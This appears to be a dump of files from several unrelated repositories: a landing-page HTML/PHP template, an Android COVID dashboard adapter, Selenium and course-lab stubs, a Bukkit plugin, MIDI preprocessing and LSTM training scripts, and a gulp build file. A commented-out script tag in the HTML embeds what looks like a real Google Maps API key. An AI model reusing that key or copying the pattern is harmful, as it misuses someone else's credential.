<p>Who are in extremely love with eco friendly system.</p>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">01</h1>
<h4>Basic</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£199.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">02</h1>
<h4>Economy</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£299.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">03</h1>
<h4>Premium</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£399.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">04</h1>
<h4>Enterprise</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£499.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End price Area -->
<!-- Start booking Area -->
<section class="booking-area section-gap relative" id="consultancy">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row justify-content-between align-items-center">
<div class="col-lg-6 col-md-6 booking-left">
<div class="active-review-carusel">
<div class="single-carusel">
<img src="img/r1.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
<img src="img/r2.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
</div>
<div class="single-carusel">
<img src="img/r1.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
<img src="img/r2.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
</div>
<div class="single-carusel">
<img src="img/r1.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
<img src="img/r2.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
</div>
</div>
</div>
<div class="col-lg-4 col-md-6 booking-right">
<h4 class="mb-20">Appointment Form</h4>
<form action="#">
<input class="form-control" type="text" name="name" placeholder="Your name" required>
<input class="form-control" type="email" name="email" placeholder="Email Address" required>
<input class="form-control" type="text" name="phone" placeholder="Phone Number" required>
<div class="input-group dates-wrap">
<input id="datepicker" class="dates form-control" id="exampleAmount" placeholder="Date & time" type="text">
<div class="input-group-prepend">
<span class="input-group-text"><span class="lnr lnr-calendar-full"></span></span>
</div>
</div>
<textarea class="common-textarea form-control mt-10" name="message" placeholder="Messege" onfocus="this.placeholder = ''" onblur="this.placeholder = 'Messege'"></textarea>
<button class="btn btn-default btn-lg btn-block text-center">Book Now!</button>
</form>
</div>
</div>
</div>
</section>
<!-- End booking Area -->
<!-- Start latest-blog Area -->
<section class="latest-blog-area section-gap" id="blog">
<div class="container">
<div class="row d-flex justify-content-center">
<div class="menu-content pb-60 col-lg-8">
<div class="title text-center">
<h1 class="mb-10">Latest News from our Blog</h1>
<p>Who are in extremely love with eco friendly system.</p>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-6 single-blog">
<img class="img-fluid" src="img/b1.jpg" alt="">
<ul class="tags">
<li><a href="#">Travel</a></li>
<li><a href="#">Life style</a></li>
</ul>
<a href="#"><h4>Portable latest Fashion for young women</h4></a>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.
</p>
<p class="post-date">31st January, 2018</p>
</div>
<div class="col-lg-6 single-blog">
<img class="img-fluid" src="img/b2.jpg" alt="">
<ul class="tags">
<li><a href="#">Travel</a></li>
<li><a href="#">Life style</a></li>
</ul>
<a href="#"><h4>Portable latest Fashion for young women</h4></a>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.
</p>
<p class="post-date">31st January, 2018</p>
</div>
</div>
</div>
</section>
<!-- End latest-blog Area -->
<!-- Start gallery Area -->
<section class="gallery-area">
<div class="container-fluid">
<div class="row no-padding">
<div class="active-gallery">
<div class="item single-gallery">
<div class="thumb">
<img src="img/g1.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
<div class="item single-gallery">
<div class="thumb">
<img src="img/g2.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
<div class="item single-gallery">
<div class="thumb">
<img src="img/g3.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
<div class="item single-gallery">
<div class="thumb">
<img src="img/g4.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
<div class="item single-gallery">
<div class="thumb">
<img src="img/g5.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
<div class="item single-gallery">
<div class="thumb">
<img src="img/g6.jpg" alt="">
<div class="align-items-center justify-content-center d-flex">
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End gallery Area -->
<!-- start footer Area -->
<?php include "footer.php" ?>
<!-- End footer Area -->
<script src="js/vendor/jquery-2.2.4.min.js"></script>
<!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="<KEY>" crossorigin="anonymous"></script> -->
<script src="js/vendor/bootstrap.min.js"></script>
<!-- <script type="text/javascript" src="https://maps.googleapis.com/maps/api/js?key=AIzaSyBhOdIF3Y9382fqJYt5I_sswSrEw5eihAA"></script> -->
<script src="js/easing.min.js"></script>
<script src="js/hoverIntent.js"></script>
<script src="js/superfish.min.js"></script>
<script src="js/jquery.ajaxchimp.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.sticky.js"></script>
<script src="js/jquery.nice-select.min.js"></script>
<script src="js/parallax.min.js"></script>
<script src="js/waypoints.min.js"></script>
<script src="js/jquery.counterup.min.js"></script>
<script src="js/mail-script.js"></script>
<script src="js/main.js"></script>
</body>
</html>
| be44487177c3078e23890a20e53bfb71763ef2bb | [
"PHP"
] | 1 | PHP | krkunal29/horceclub | 112b8a5bff6014e2cf4385523c88e3bfe59922d7 | 45f7dd159af76cfb2775f869f7c07e9651195091 |
refs/heads/master | <file_sep>rootProject.name='Corona Dashboard'
include ':app'
<file_sep>package com.coronadashboard.adapters;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Typeface;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import com.coronadashboard.R;
import com.coronadashboard.model.Country;
import com.coronadashboard.model.DashboardData;
import java.util.ArrayList;
import java.util.List;
public class CountryWiseDataAdapter extends RecyclerView.Adapter<CountryWiseDataAdapter.MyViewHolder> {
private Context context;
private List<Country> listData;
public CountryWiseDataAdapter(Context context, List<Country> listData){
this.context = context;
this.listData = listData;
}
@NonNull
@Override
public CountryWiseDataAdapter.MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
View itemView = LayoutInflater.from(context).inflate(R.layout.itemview_country, parent, false);
return (new MyViewHolder(itemView));
}
@SuppressLint("SetTextI18n")
@Override
public void onBindViewHolder(@NonNull CountryWiseDataAdapter.MyViewHolder holder, int position) {
Country currentData = listData.get(position);
if (currentData.getTotalConfirmed() != 0){
holder.textViewCountry.setText(currentData.getCountry());
holder.textViewTotalCases.setText(currentData.getTotalConfirmed().toString());
holder.textViewDeaths.setText(currentData.getTotalDeaths().toString());
holder.textViewRecovered.setText(currentData.getTotalRecovered().toString());
}
}
@Override
public int getItemCount() {
return listData.size();
}
public class MyViewHolder extends RecyclerView.ViewHolder {
TextView textViewCountry, textViewTotalCases, textViewDeaths, textViewRecovered;
public MyViewHolder(@NonNull View itemView) {
super(itemView);
textViewCountry = itemView.findViewById(R.id.textViewCountry);
textViewTotalCases = itemView.findViewById(R.id.textViewTotalCases);
textViewDeaths = itemView.findViewById(R.id.textViewDeaths);
textViewRecovered = itemView.findViewById(R.id.textViewRecovered);
}
}
}
<file_sep>package com.coronadashboard.utils;
import android.provider.BaseColumns;
public class AppConstants implements BaseColumns {
public static final String seekbarMinCaseValue = "a";
public static final String seekbarMaxCaseValue = "ab";
public static final String seekbarMinDeathValue = "abc";
public static final String seekbarMaxDeathValue = "abcd";
public static final String seekbarMinRecoveredValue = "abce";
public static final String seekbarMaxRecoveredValue = "abcf";
}
<file_sep>package com.coronadashboard.utils;
import com.coronadashboard.model.Country;
import java.util.Comparator;
public class Sorting {
public static class SortByTotalCases implements Comparator<Country>
{
// Used for sorting in ascending order of
// Total Cases
@Override
public int compare(Country o1, Country o2) {
return o1.getTotalConfirmed() - o2.getTotalConfirmed();
}
}
public static class SortByRecovered implements Comparator<Country>
{
// Used for sorting in ascending order of Recovered
@Override
public int compare(Country o1, Country o2) {
return o1.getTotalRecovered() - o2.getTotalRecovered();
}
}
public static class SortByDeaths implements Comparator<Country>
{
// Used for sorting in ascending order of Deaths
@Override
public int compare(Country o1, Country o2) {
return o1.getTotalDeaths() - o2.getTotalDeaths();
}
}
}
| 715cb17efecc05622999f0e277403bc6c14a7415 | [
"Java",
"Gradle"
] | 4 | Gradle | avi-nitb/Corona_Dashboard | 8ef65b927c3d17543f0dc99e7d2ae3626c46221f | 2dd9a1842ba865eac6c71dc0a3b2cbfae7b6ae25 |
refs/heads/master | <repo_name>NavneetKaurPopli/technavneetpopli<file_sep>/web_testing/src/test/java/UVicTest.java
import static org.junit.jupiter.api.Assertions.*;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.openqa.selenium.By;
import org.openqa.selenium.Keys;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.chrome.ChromeDriver;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.safari.SafariDriver;
import org.openqa.selenium.support.ui.ExpectedConditions;
import org.openqa.selenium.support.ui.WebDriverWait;
import java.util.concurrent.TimeUnit;
public class UVicTest {
WebDriver browser;
@BeforeEach
public void setUp() {
// Chrome
System.setProperty("webdriver.chrome.driver", "*****LOCATION OF YOUR WEBDRIVER*****");
browser = new ChromeDriver();
// Firefox
// System.setProperty("webdriver.gecko.driver", "*****LOCATION OF YOUR WEBDRIVER*****");
// browser = new FirefoxDriver();
// Safari
// browser = new SafariDriver();
browser.manage().window().maximize();
}
@AfterEach
public void cleanUp() {
browser.quit();
}
// Your tests go here
}
<file_sep>/Labs/Lab_7/readme.txt
Exercise 2:
Answer one question only, NOT ALL SIX.
Indicate which number question you've decided to answer (1-6):
Your answer (100 words max):
<file_sep>/Labs/Lab_1/readme.txt
Your name:
Your student number:
Questions:
----------------------
1. Why can’t we exhaustively test our entire software project? What should we do instead?
Your answer to question 1 (max 100 words):
----------------------
2. What is the pesticide paradox about and what does it imply to software testers?
Your answer to question 2 (max 100 words):
----------------------
3. Why should we automate, as much as possible, the test execution?
Your answer to question 3 (max 100 words):
=======================
Our feedback will appear below this line once your answers are marked:
1.
2.
3.
<file_sep>/Labs/Lab_3/readme.txt
Your name:
Your student number:
Questions:
----------------------
3. Execute the smoke test, with coverage enabled. Name 2 classes that are not well tested.
Take a look at those classes, and speculate as to their purpose. (0.5%)
Your answer to question 3 (max 100 words):
----------------------
4. Is the move() method in the game.Game class covered by the smoke test? (0.5%)
Your answer to question 4 (max 100 words, but yes or no will be fine):
----------------------
5. Change the getDeltaX() method in board.Direction, so that it returns deltaY instead.
Rerun the smoke test and note the resulting error. Is the error message you see helpful in
diagnosing the problem, or is there not enough context to figure out what went wrong?
Would you prefer a smoke test or a unit test if you had to fix the problem from scratch? (0.5%)
Make sure you undo the change to getDeltaX() before moving on to the next question.
Your answer to question 5 (max 100 words):
-----------------------
6. Skim over the Game, Unit, Board and Level classes and explain (max 100 words) how it
appears these four classes are related to each other – what role does each play? What
does each represent? (0.5%)
Your answer to question 6 (max 100 words):
<file_sep>/Labs/Lab_5/readme.txt
Exercise 2:
Questions:
----------------------
Which standards testing tool did you use? (Just the name is enough - example: Lighthouse)
Your answer to question 3 (max 100 words):
----------------------
Name any test that passed, and describe what the test found in your own words. (Example:
Passed the 'super nice colours test'. This test checks to see if all the colours on the webpage
are super nice. They were all shades of purple, and purple is super nice.) (not a real test,
but hopefully that helps.) (100 words max):
----------------------
Name any test that failed (yellow or red) and describe what the test found in your own words.
(Example: failed the 'make my dinner' test. The webpage got only 5% on the test, because it
completely failed to make my dinner.) (again, just an example) (100 words max):
<file_sep>/Ten_Pin_Bowling/settings.gradle
rootProject.name = 'tpb_working'
<file_sep>/Ten_Pin_Bowling/src/main/java/app/BowlingGame.java
package app;
import java.util.ArrayList;
public class BowlingGame {
public static final int NUMBER_OF_FRAMES = 10;
private final int[] rolls;
public BowlingGame(int[] rolls) {
this.rolls = rolls;
}
public int score() {
int result = 0;
ArrayList<BowlingFrame> frames = createFrames();
for (BowlingFrame frame: frames) {
result += frame.score();
}
return result;
}
private ArrayList<BowlingFrame> createFrames() {
ArrayList<BowlingFrame> frames = new ArrayList<>();
int rollIndex = 0;
for (int i = 0; i < NUMBER_OF_FRAMES; i++) {
ArrayList<Integer> frameRolls = new ArrayList<>();
// add/change code below
frameRolls.add(-1);
// add/change code above
frames.add(new BowlingFrame(frameRolls));
}
return frames;
}
}
| b9add2ab7f67785727beca8f2b275f0b9c40143f | [
"Java",
"Text",
"Gradle"
] | 7 | Java | NavneetKaurPopli/technavneetpopli | 8755722ee9edb2cc797fc0ef6026e90656c75060 | 6ffdb1f46c1c6122712f725807169b6e820dd102 |
refs/heads/main | <file_sep>package me.warpromo.bridging;
import java.util.ArrayList;
import java.util.HashMap;
import org.bukkit.block.Block;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.block.BlockPlaceEvent;
public class ClickEvent implements Listener {
private Main plugin;
public ClickEvent(Main plugin) {
this.plugin = plugin;
}
@EventHandler
public void placeBlock(BlockPlaceEvent e) {
HashMap<String, Boolean> recording = plugin.recording;
System.out.println("Checking if Player in recording");
if(recording.containsKey(e.getPlayer().getName()) == false) return;
System.out.println("Recording contains Player");
ArrayList<Block> blocks = plugin.placedBlocks.get(e.getPlayer().getName());
blocks.add(e.getBlock());
plugin.placedBlocks.replace(e.getPlayer().getName(), blocks);
System.out.println(e.getBlock().getType());
}
}
| 7d9a88de9adc830ced70eded29585b6da5786290 | [
"Java"
] | 1 | Java | WarPromo/bridging-plugin | d24c0f6d6a1e7d4c5f4567ce772a2dc2e171443b | 2bdc78b6d378cd4fb5490e78ffd7ff3e2c8f70c6 |
refs/heads/master | <repo_name>JDoI/repo<file_sep>/nande/app/controllers/index.js
function doClickLabel1(e) {
alert($.label1.text);
}
function doClickButton1(e) {
alert('クリックされました');
}
function doClickSwitch1(e) {
alert('変更されました');
}
function doOptionDialog1(e) {
var dialogOptions = {
title:'なにでシェアしますか?',
//aa:0 bb:1 キャンセル:2 と番号がふられる
options:['aa','bb','キャンセル'],
//キャンセルは何番か
cancel:2,
//削除カラー(赤)にするオプションを指定
destructive:0
};
var dialog = Titanium.UI.createOptionDialog(dialogOptions);
dialog.show();
}
$.index.open();
| af3e7fb0ca4753fb3075da6a01cdd6d0e9e8d0c5 | [
"JavaScript"
] | 1 | JavaScript | JDoI/repo | 9c58d51df887615f6406ec3ddc5626a44d699b2d | 3afd1557beb4efc91e2cae0a2c776280fc378edb |
refs/heads/master | <repo_name>alexjjseppala/capstone<file_sep>/preprocessing/pickled_midi_cleaner.py
import os
import pickle
from shutil import copyfile
with open('preprocessing/notes_dictionary', 'rb') as f:
output_dictionary = pickle.load(f)
dictionary_max = len(output_dictionary) - 1
filenames = os.listdir('preprocessing/pickled_input_midis')
for filename in filenames:
if filename.endswith(".mid"):
with open('preprocessing/pickled_input_midis/' + filename, "rb") as fp:
pickled_values = pickle.load(fp)
file_is_good = True
index = 0
while file_is_good and index != len(pickled_values):
if pickled_values[index] > dictionary_max:
file_is_good = False
index += 1
if file_is_good:
copyfile('preprocessing/pickled_input_midis/' + filename, 'preprocessing/clean_pickled_midis/' + filename)
<file_sep>/preprocessing/test.py
from music21 import *
import pickle
import os
import sys
# with open('preprocessing/pickled_input_midis/pickled_Een-Roos-Kan-Niet-Zonder-Zonneschijn.mid', "rb") as fp:
# pickled_values = pickle.load(fp)
with open('preprocessing/pickled_ZZs_song.mid', "rb") as fp:
pickled_values = pickle.load(fp)
with open('preprocessing/notes_dictionary', "rb") as fp:
notes_dictionary = pickle.load(fp)
# parsed_midi = converter.parse('preprocessing/downsampled_midis_test/Een-Roos-Kan-Niet-Zonder-Zonneschijn.mid')
for i in range(len(pickled_values)):
print(notes_dictionary[pickled_values[i]])<file_sep>/preprocessing/src_midis_cleaner.py
import os
import pickle
from shutil import copyfile
#go through clean_pickled_midis
filenames = os.listdir('preprocessing/clean_pickled_midis')
for filename in filenames:
if filename.endswith(".mid") and filename.startswith("pickled_"):
#MOVE found midis from src_midis to used_src_midis
os.rename("preprocessing/src_midis/" + str(filename[8:]), "preprocessing/used_src_midis/" + str(filename[8:]))<file_sep>/nueralNet(1).py
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import Activation
from keras.utils import np_utils
from keras import backend
from keras.callbacks import ModelCheckpoint
import pickle
import numpy
import os
# Get song ints
def getSongInts(directory):
with open(directory + "/" + "pickled_ZZs_song.mid", "rb") as fp:
songIntList = pickle.load(fp)
return songIntList
# Get Sequence
def getSequencesFromFile(fileToExtractSeqences, seqLength, directory):
sequences = []
sequenceOutput = []
with open(directory + "/" + fileToExtractSeqences, "rb") as fp:
songIntList = pickle.load(fp)
for i in range(0, len(songIntList) - 100 ):
sequenceOutput.append(songIntList[i + seqLength])
sequences.append(songIntList[i:i + seqLength])
return sequences, sequenceOutput
def testSequenceAccuracy(sequencesToTest, directory):
songInts = getSongInts(directory)
start = 0
stop = 100
for sequence in sequencesToTest:
print(sequence[0] == songInts[start:stop])
start += 1
stop += 1
def buildNetwork(network_input, n_vocab):
""" create the structure of the neural network """
model = Sequential()
model.add(LSTM(
512,
input_shape=(network_input.shape[1], network_input.shape[2]),
return_sequences=True
))
model.add(Dropout(0.3))
model.add(LSTM(512, return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(512))
model.add(Dense(256))
model.add(Dropout(0.3))
model.add(Dense(n_vocab))
model.add(Activation('softmax'))
model.compile(loss='sparse_categorical_crossentropy', optimizer='rmsprop')
return model
def train(model, network_input, network_output):
""" train the neural network """
filepath = "weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5"
checkpoint = ModelCheckpoint(
filepath,
monitor='loss',
verbose=0,
save_best_only=True,
mode='min'
)
callbacks_list = [checkpoint]
model.fit(network_input, network_output, epochs=200, batch_size=64, callbacks=callbacks_list)
sequenceLength = 100
sequenceList = []
sequenceOutputList = []
midiDir = "C:/Users/a-sho/Documents/AQueensWork/4thyear/ELEC498/code/PickledMidis"
for filename in os.listdir(midiDir):
if filename.endswith(".mid"):
newSequences, newOutputs = getSequencesFromFile(filename, sequenceLength, midiDir)
for seq in newSequences:
sequenceList.append(seq)
for out in newOutputs:
sequenceOutputList.append(out)
sequenceList = numpy.reshape(sequenceList, (len(sequenceList), sequenceLength, 1))
#sequenceOutputList = sequenceOutputList[0:(int(len(sequenceOutputList)/4))]
#sequenceOutputList = backend.sparse_categorical_crossentropy(sequenceOutputList)
with open('notes_dictionary', "rb") as fp:
notesDictionary = pickle.load(fp)
notesLength = len(set(notesDictionary))
model = buildNetwork(sequenceList, notesLength)
train(model, sequenceList, sequenceOutputList)
print("")
<file_sep>/preprocessing/preprocessing_combined.py
#run "nohup python preprocessing/preprocessing_combined.py &" on the server to run the script on the full dataset
# the output will be written to nohup.out at the top level project src_directory
from music21 import *
import os
import time
import sys
import signal
import pickle
# output_dictionary = []
def test_request(arg=None):
"""Your http request."""
time.sleep(2)
return arg
class Timeout():
"""Timeout class using ALARM signal."""
class Timeout(Exception):
pass
def __init__(self, sec):
self.sec = sec
def __enter__(self):
signal.signal(signal.SIGALRM, self.raise_timeout)
signal.alarm(self.sec)
def __exit__(self, *args):
signal.alarm(0) # disable alarm
def raise_timeout(self, *args):
raise Timeout.Timeout()
#converts all midi files in the midi_downsampling_step_1/src_midis to simpler version (2 tracks, one piano one percussion)
#and stores them into midi_downsampling_step_1/dst_midis
src_directory = "preprocessing/src_midis"
def note_array_to_pitch_string(note):
pitches = ""
if note != 0:
if not note.isRest:
for pitch in range(len(note.pitches)):
pitches += note.pitches[pitch].nameWithOctave
pitches += " "
return pitches
def downsample(parsed_midi_tracks):
piano_tracks = []
percussion_tracks = []
for track in range(len(parsed_midi_tracks)):
channels = parsed_midi_tracks[track].getChannels()
if 10 in channels:
percussion_tracks.append(parsed_midi_tracks[track])
else:
piano_tracks.append(parsed_midi_tracks[track])
outStream = stream.Stream()
piano_notes = []
percussion_notes = []
if len(piano_tracks) > 0:
piano_stream = midi.translate.midiTracksToStreams(piano_tracks)
piano_notes = piano_stream.flat.notesAndRests
if len(percussion_tracks) > 0:
percussion_stream = midi.translate.midiTracksToStreams(percussion_tracks)
percussion_notes = percussion_stream.flat.notesAndRests
#in theory the normalization and training could be done here
#or this script could be run to pre-simplify the midi files first
outStream.append(stream.Part(piano_notes))
outStream.append(stream.Part(percussion_notes))
downsampled_midi = midi.translate.streamToMidiFile(outStream)
# outFile.open('midi_downsampling_step_1/dst_midis/' + filename, "wb")
# outFile.write()
# outFile.close()
downsampled_midi.tracks[0].setChannel(1)
downsampled_midi.tracks[1].setChannel(10)
# downsampled_midi.open('preprocessing/downsampled_midis_test/' + filename, "wb")
# downsampled_midi.write()
# downsampled_midi.close()
return downsampled_midi
def normalize_prep(downsampled_midi):
if os.path.exists('preprocessing/notes_dictionary'):
with open('preprocessing/notes_dictionary', 'rb') as f:
# The protocol version used is detected automatically, so we do not
# have to specify it.
output_dictionary = pickle.load(f)
else:
print("making new dictionary")
output_dictionary = []
with open("preprocessing/notes_dictionary_prev", "wb") as fp: #Pickling
pickle.dump(output_dictionary, fp)
downsampled_midi_stream = midi.translate.midiFileToStream(downsampled_midi)
#flat combines all voices(not sure why it wasnt fully flattened before, but had to move on)
#chordify combines all notes with same offset into a chord for each stream
piano_stream = downsampled_midi_stream[0].flat.chordify()
#combine and sychronize the piano and percussion notes and chords together
#find shortest duration and longest time in each stream to dermine the lowest sample rate
#which is used to create the synchronized array sizes
smallest_interval = min([x['durationSeconds'] for x in piano_stream.secondsMap])
highest_time = piano_stream.highestTime
if len(downsampled_midi_stream) == 2:
percussion_stream = downsampled_midi_stream[1].flat.chordify()
percussion_smallest_interval = min([x['durationSeconds'] for x in percussion_stream.secondsMap])
smallest_interval = min(smallest_interval,percussion_smallest_interval)
highest_time = max(highest_time, percussion_stream.highestTime)
note_array_percussion = [0] * round(highest_time/smallest_interval)
note_array_piano = [0] * round(highest_time/smallest_interval)
#put each note or chord into the array based on their offsets
for i in range(len(piano_stream)):
note_array_piano[round(piano_stream[i].offset/smallest_interval)] = piano_stream[i]
if len(downsampled_midi_stream) == 2:
for i in range(len(percussion_stream)):
note_array_percussion[round(percussion_stream[i].offset/smallest_interval)] = percussion_stream[i]
nn_normalized_input = []
cache = {}
if len(downsampled_midi_stream) == 2:
for i in range(len(note_array_percussion)):
#construct the dictionary tuple
piano_pitches = note_array_to_pitch_string(note_array_piano[i])
percussion_pitches = note_array_to_pitch_string(note_array_percussion[i])
if (piano_pitches,percussion_pitches) in cache:
dictionary_index = cache[(piano_pitches,percussion_pitches)]
elif (piano_pitches,percussion_pitches) in output_dictionary:
dictionary_index = output_dictionary.index((piano_pitches,percussion_pitches))
cache[(piano_pitches,percussion_pitches)] = dictionary_index
else:
output_dictionary.append((piano_pitches,percussion_pitches))
dictionary_index = len(output_dictionary) - 1
cache[(piano_pitches,percussion_pitches)] = dictionary_index
nn_normalized_input.append(dictionary_index) #turn into float with dictionary index later
else:
for i in range(len(note_array_piano)):
#construct the dictionary tuple
piano_pitches = note_array_to_pitch_string(note_array_piano[i])
percussion_pitches = ""
if (piano_pitches,percussion_pitches) in cache:
dictionary_index = cache[(piano_pitches,percussion_pitches)]
elif (piano_pitches,percussion_pitches) in output_dictionary:
dictionary_index = output_dictionary.index((piano_pitches,""))
cache[(piano_pitches,percussion_pitches)] = dictionary_index
else:
output_dictionary.append((piano_pitches,percussion_pitches))
dictionary_index = len(output_dictionary) - 1
cache[(piano_pitches,percussion_pitches)] = dictionary_index
nn_normalized_input.append(dictionary_index) #turn into float with dictionary index later
with open("preprocessing/notes_dictionary", "wb") as fp: #Pickling
pickle.dump(output_dictionary, fp)
with open("preprocessing/pickled_input_midis/pickled_" + filename, "wb") as fp: #Pickling
pickle.dump(nn_normalized_input, fp)
def preprocess(filename):
filepath = src_directory +"/" + filename
parsed_midi = midi.MidiFile()
parsed_midi.open(filepath, "rb")
parsed_midi.read()
parsed_midi.close()
parsed_midi_tracks = parsed_midi.tracks
piano_tracks = []
percussion_tracks = []
#removing single track songs with percussion
if len(parsed_midi_tracks) == 1 and 10 in parsed_midi_tracks[0].getChannels():
print("skipping " + str(filename))
else:
downsampled_midi = downsample(parsed_midi_tracks)
nn_normalized_input = normalize_prep(downsampled_midi)
start = time.time()
filenames = os.listdir(src_directory)
total = len(filenames) - 1
count = 0
for filename in filenames:
if filename.endswith(".mid"):
count += 1
sys.stdout.write("\r" + str(count) + "/" + str(total))
sys.stdout.flush()
try:
with Timeout(90):
preprocess(filename)
except Exception as e:
print(e)
print("skipping " + str(filename))
continue
else:
continue
end = time.time()
sys.stdout.write("\nDone!\nTime elapsed: " + str(end - start)) | 40e060ac56afca4d68b96471acb3c4b00a3e6968 | [
"Python"
] | 5 | Python | alexjjseppala/capstone | 2ad3c58af1fc2373191357d0750927896ff3678a | a86c65a2fc862b09673947115596b59888d6611e |
refs/heads/master | <file_sep>'use strict';
var gulp = require('gulp');
var sass = require('gulp-sass');
var sassLint = require('gulp-sass-lint');
var livereload = require('gulp-livereload');
var http = require('http');
var st = require('st');
gulp.task('sass', function () {
return gulp.src(['./src/stylesheets/*.scss'])
.pipe(sassLint())
.pipe(sassLint.format())
.pipe(sassLint.failOnError())
.pipe(sass({outputStyle: 'compressed'}).on('error', sass.logError))
.pipe(gulp.dest('./dist'))
.pipe(livereload());
});
gulp.task('watch', ['server'], function () {
livereload.listen({ basePath: 'dist' });
gulp.watch(['./src/stylesheets/*.scss', './src/stylesheets/**/*.scss'], ['sass']);
});
gulp.task('server', function(done) {
http.createServer(
st({ path: __dirname + '/dist', index: 'index.html', cache: false })
).listen(8080, done);
});
| e3e34179058d51ccc5ec00963619e8913888d538 | [
"JavaScript"
